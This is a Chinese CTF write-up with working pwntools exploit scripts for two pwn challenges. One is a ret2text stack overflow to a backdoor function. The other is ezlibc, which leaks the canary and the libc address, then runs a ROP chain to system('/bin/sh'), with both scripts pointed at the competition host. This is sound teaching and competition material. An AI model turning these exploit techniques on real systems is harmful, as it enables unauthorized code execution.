湘岚杯2025

ret2text签到

检查保护，64位无保护

查看程序，发现后门函数。栈溢出劫持程序流到后门函数

from pwn import *
from pwn import p8,p16,p32,p64,u32,u64
from struct import pack
from LibcSearcher import * # type: ignore
from ctypes import*
from MyPwn import*

#========================
context.arch='amd64'
# context.arch = 'i386'
# context.log_level = 'debug'

host='xlctf.huhstsec.top'
port=41313
file_name='1'

Breakpoint_NoPIE=0x1100
Breakpoint_PIE=0x1100
#========================

local_file = '/mnt/c/Users/HelloCTF_OS/Desktop/Pwn_file/'+ file_name
elf=ELF(local_file)
local_libc = elf.libc.path
libc=ELF(local_libc, checksec = False)

def Start():
    if args.C:
        ROPgadget(local_file)
        exit(0)
    elif args.CL:
        ROPgadget(local_libc)
        exit(0)
    elif args.G:
        gdbscript = f'b *{Breakpoint_NoPIE}'
        io = process(local_file)
        gdb.attach(io, gdbscript)
    elif args.GP:
        gdbscript = f'b *$rebase({Breakpoint_PIE})'
        io = process(local_file)
        gdb.attach(io, gdbscript)
    elif args.P:
        io = process(local_file)
    else:
        io = remote(host,port)
    return io

def Exp():
    1==1
    binsh_add = 0x000000000040115A

    offset = 0x0A
    payload = b'a'*(offset+8) + p64(binsh_add)

    io.sendlineafter(b'xlctf',payload)

if __name__=='__main__':
    io=Start()
    Exp()
    io.interactive()

ezlibc

检查保护，开了代码执行保护和Canary

查看程序，有两次栈溢出的read，刚好可以一次泄露Canary一次泄露libcbase

from pwn import *
from pwn import p8,p16,p32,p64,u32,u64
from struct import pack
from LibcSearcher import * # type: ignore
from ctypes import*
from MyPwn import*

#========================
context.arch='amd64'
# context.arch = 'i386'
# context.log_level = 'debug'

host='xlctf.huhstsec.top'
port=45380
file_name='ezlibc'

Breakpoint_NoPIE=0x1100
Breakpoint_PIE=0x1100
#========================

local_file = '/mnt/c/Users/HelloCTF_OS/Desktop/Pwn_file/'+ file_name
elf=ELF(local_file)
local_libc = elf.libc.path
libc=ELF(local_libc, checksec = False)

def Start():
    if args.C:
        ROPgadget(local_file)
        exit(0)
    elif args.CL:
        ROPgadget(local_libc)
        exit(0)
    elif args.G:
        gdbscript = f'b *{Breakpoint_NoPIE}'
        io = process(local_file)
        gdb.attach(io, gdbscript)
    elif args.GP:
        gdbscript = f'b *$rebase({Breakpoint_PIE})'
        io = process(local_file)
        gdb.attach(io, gdbscript)
    elif args.P:
        io = process(local_file)
    else:
        io = remote(host,port)
    return io

def Exp():
    1==1

    ret_add = 0x000000000040059e
    pop_rdi = 0x0000000000400843
    main_add = 0x00000000004006E7
    puts_got = elf.got['puts']
    puts_plt = elf.plt['puts']

    print("Puts_got: ",hex(puts_got))
    print("Puts_plt: ",hex(puts_plt))

    offset = 0x30
    io.sendafter(b'flag!', b'a'*(offset-8+1))
    io.recvuntil(b'a'*(offset-8+1))
    canary = u64(b'\00' + io.recv(7))
    print(f'Canary: {hex(canary)}')

    payload1 = b'a'*(offset-8) + p64(canary) + b'a'*8 + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(main_add)
    io.sendlineafter(b'key', payload1)
    puts_addr = u64(io.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
    print("Puts_add: ",hex(puts_addr))

    libc = LibcSearcher('puts',puts_addr)   # libc6_2.27-3ubuntu1.6_amd64

    libc_base = puts_addr - libc.dump('puts')
    system_add = libc_base + libc.dump('system')
    bin_sh_add = libc_base + libc.dump('str_bin_sh')

    payload2 = b'a'*(offset-8) + p64(canary) + b'a'*8 + p64(ret_add) + p64(pop_rdi) + p64(bin_sh_add) + p64(system_add)
    io.sendlineafter(b'flag!',payload2)

if __name__=='__main__':
    io=Start()
    Exp()
    io.interactive()